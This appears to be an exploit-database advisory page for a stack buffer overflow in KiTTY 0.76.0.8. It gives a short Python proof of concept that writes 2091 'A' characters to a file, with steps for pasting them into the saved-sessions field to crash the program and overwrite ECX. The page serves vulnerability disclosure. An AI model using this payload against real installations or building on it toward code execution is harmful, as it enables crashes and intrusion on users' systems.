Kitty 0.76.0.8 Stack Buffer Overflow

2022.06.20

Credit: Yehia Elghaly

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-119

# Exploit Title: Kitty 0.76.0.8 Stack Buffer Overflow
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-06-08
# Vendor Homepage: http://www.9bis.net/kitty/index.html#!index.md
# Software Link : https://www.fosshub.com/KiTTY.html?dwl=kitty_portable-0.76.0.8.exe
# Tested Version: 0.76.0.8
# Vulnerability Type: Buffer Overflow
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64

# Description: Kitty 0.76.0.8 Stack Buffer Overflow

# Steps to reproduce:
# 1. - Run the python script and it will create exploit.txt file.
# 3. - Kitty 0.76.0.8
# 4. - Sessions -> Save
# 5. - Paste the characters of txt to Saved/Sessions then click save
# 6. - Crashed
# Note: ECX Overwwrite 

#!/usr/bin/python

exploit = 'A' * 2091

try: 
    file = open("exploit.txt","w")
    file.write(exploit)
    file.close()

    print("POC is created")
except:
    print("POC not created")

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Kitty 0.76.0.8 Stack Buffer Overflow

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.